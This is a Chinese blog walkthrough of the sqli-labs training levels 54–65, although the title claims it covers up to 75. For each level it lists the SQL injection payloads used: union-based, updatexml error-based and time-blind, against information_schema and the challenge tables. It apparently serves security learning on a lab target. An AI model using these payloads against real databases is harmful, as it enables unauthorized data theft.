sqli-labs靶场challenges第54-75关(超详细)

目录

第五十四关(单引号闭合):

第五十五关(括号闭合):

第五十六关(单引号+括号闭合):

第五十七关(双引号闭合):

第五十八关(单引号闭合报错注入):

 第五十九关(数字型报错注入):

第六十关(双引号+括号闭合):

第六十一关(单引号+双括号闭合报错注入):

第六十二关(单引号+括号闭合时间盲注):

第六十三关:

第六十四关(双括号闭合):

第六十五关(双引号+括号闭合):


第五十四关(单引号闭合):

 '检查注入点,无回显猜测是有注入点,极可能是'闭合

?id=1' 

order by来检测表头的长度(有多少列数据)

?id=1'order by 3--+   

3不报错4报错说明这个表头长度为3

 ?id=1'order by 4--+ 

 用select数字来看回显的是那些数据

 ?id=-1'union select 1,2,3--+

group_concat用来连接输出所有数据, information_schema.tables里面存储的是数据库的所有表,用where指定数据库,查出challenges数据库里面的表

?id=-1'union select 1,group_concat('---',table_name),3 from information_schema.tables where table_schema=database() --+

 information_schema.columns里面存储了所有表column数据

?id=-1'union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='bsfmy3ozu2 '--+ 

知道数据库,表名即可拿到key

 ?id=-1'union select 1,database(),secret_X88U from challenges.bsfmy3ozu2 --+

第五十五关(括号闭合):

尝试闭合

?id=1'--+
?id=1"--+
?id=1')--+
?id=1")--+
?id=1)--+ #闭合成功

 下面正常流程不截图了

?id=1)order by 3--+
?id=1)order by 4--+
?id=1)union select 1,2,3--+

?id=-1)union select 1,group_concat('---',table_name),3 from information_schema.tables where table_schema=database() --+

?id=-1)union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='a9igyut39t '--+

#Your Password:id,sessid,secret_GFFY,tryy

?id=-1)union select 1,database(),secret_1C9Y from challenges.a9igyut39t --+

第五十六关(单引号+括号闭合):

?id=1')--+
?id=1')order by 3--+
?id=1')order by 4--+

?id=-1')union select 1,group_concat('---',table_name),3 from information_schema.tables where table_schema=database() --+

?id=-1')union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='a4gj4m6ys3'--+

?id=-1')union select 1,database(),secret_2D7B from challenges.a4gj4m6ys3--+

第五十七关(双引号闭合):

?id=1"--+
?id=1"order by 3--+
?id=1"order by 4--+

?id=-1"union select 1,group_concat('---',table_name),database() from information_schema.tables where table_schema=database() --+

?id=-1"union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='rjqm0ci7wu'--+

?id=-1"union select 1,database(),secret_LB75 from challenges.rjqm0ci7wu--+

第五十八关(单引号闭合报错注入):

发现有报错,这题也可以使用报错注入

?id=1'"--+
#根据报错提示是'闭合

?id=-1'and updatexml(1,concat(0x7e,database()),0)--+
#通过报错来报数据库名

?id=-1'and updatexml(1,(select concat(0x7e,(select table_name from information_schema.tables where table_schema=database()))),0)--+

?id=-1'and updatexml(1,(select concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='442g4a2kuk'))),0)--+

?id=-1'and updatexml(1,(select concat(0x7e,(select secret_3ZLC from challenges.442g4a2kuk))),0)--+

 第五十九关(数字型报错注入):

?id=1'"--+  
#报错  ''"-- LIMIT 0,1'

?id=-1 and updatexml(1,concat(0x7e,database()),0)--+
#通过报错来报数据库名

?id=-1 and updatexml(1,(select concat(0x7e,(select table_name from information_schema.tables where table_schema=database()))),0)--+
#通过报错来报表名

?id=1 and updatexml(1,(select concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='s807gasyqb'))),0)--+
#通过报错来报表头

?id=-1 and updatexml(1,(select concat(0x7e,(select secret_4QQN from challenges.s807gasyqb))),0)--+
#通过报错来报数据拿到key

第六十关(双引号+括号闭合):

?id=1'
?id=1"
#报错'"1"") LIMIT 0,1'   用")闭合

?id=1")and updatexml(1,(select concat(0x7e,(select table_name from information_schema.tables where table_schema=database()))),0)--+

?id=1")and updatexml(1,(select concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='353088z82v'))),0)--+

?id=1")and updatexml(1,(select concat(0x7e,(select secret_CO9B from challenges.353088z82v))),0)--+

第六十一关(单引号+双括号闭合报错注入):

?id=1' #报错
?id=1'"--+
#报错'"-- ')) LIMIT 0,1'    用'))闭合

?id=1'))and updatexml(1,(select concat(0x7e,(select table_name from information_schema.tables where table_schema=database()))),0)--+

?id=1'))and updatexml(1,(select concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='wbbj8btit5'))),0)--+

?id=1'))and updatexml(1,(select concat(0x7e,(select secret_FT28 from challenges.wbbj8btit5))),0)--+

第六十二关(单引号+括号闭合时间盲注):

?id=1'     #无回显
?id=1'--+  #无回显
?id=1')--+ #有回显 用')闭合

?id=1')order by 3--+
?id=1')order by 4--+


?id=1')and if(length((select table_name from information_schema.tables where table_schema=database()))>100,1,sleep(10))--+

第六十三关:

?id=1'     #无回显
?id=1'--+  #有回显 用'闭合

?id=1'order by 3--+
?id=1'order by 4--+

?id=-1'and union select 1,2,3--+   #无回显
?id=1'and sleep(10)--+   #延迟返回

payload
?id=1'and if(length((select table_name from information_schema.tables where table_schema=database()))>100,1,sleep(10))--+

第六十四关(双括号闭合):

源码,闭合的方式是))

$sql="SELECT * FROM security.users WHERE id=(($id)) LIMIT 0,1";

payload

?id=1))order by 3--+
?id=1))order by 4--+

?id=-1))union select 1,2,3--+  #没有返回有用消息
?id=1))and sleep(2)--+   #延迟返回

payload
?id=1))and if(length((select table_name from information_schema.tables where table_schema=database()))>100,1,sleep(10))--+

第六十五关(双引号+括号闭合):

?id=1'        #有回显
?id=1"        #无回显
?id=1"--+     #无回显
?id=1")--+    #有回显 用")闭合


?id=-1")union select 1,2,3--+  #没有返回有用消息
?id=1")and sleep(2)--+   #延迟返回

payload
?id=1")and if(length((select table_name from information_schema.tables where table_schema=database()))>100,1,sleep(10))--+

  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
对于sqli-labs靶场详细攻略,我可以为你提供一些建议。sqli-labs是一个专注于SQL注入漏洞的靶场,用于学习和实践SQL注入攻击技术。以下是一些攻略提示: 1. 理解基础知识:在开始攻击之前,确保你对SQL注入的基本原理有所了解。了解SQL语句的结构和工作原理,以及可能导致注入漏洞的常见错误和不安全的编码实践。 2. 探测漏洞点:浏览sqli-labs靶场,寻找有可能存在SQL注入漏洞的页面。通常,URL参数或表单输入是最容易受到注入攻击的地方。注意目标页面上是否存在可供利用的漏洞点。 3. 利用注入漏洞:一旦找到注入漏洞点,你可以通过构造恶意的输入来利用它。尝试不同类型的注入攻击,如基于布尔盲注、错误注入、联合查询等。使用不同的技巧和payload来探测和利用漏洞。 4. 获取数据:成功利用注入漏洞后,你可以通过注入语句获取目标数据库中的数据。尝试使用SELECT语句来提取数据,并根据数据库的结构和内容来编写合适的查询语句。 5. 升级攻击:一旦你能够成功提取数据,尝试进一步升级攻击。这可能包括通过注入管理员账号、执行操作或命令、提权等来控制目标系统。 6. 学习和总结:在攻击过程中,及时记录你的操作和结果。理解每个攻击步骤的原理和技术细节,并从中吸取经验和教训。这将帮助你提高对SQL注入漏洞的理解和攻击能力。 需要注意的是,在进行任何攻击之前,请确保你只在合法授权的环境中使用sqli-labs靶场,并遵循道德黑客准则。安全性和合法性是进行攻击和学习的前提条件。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值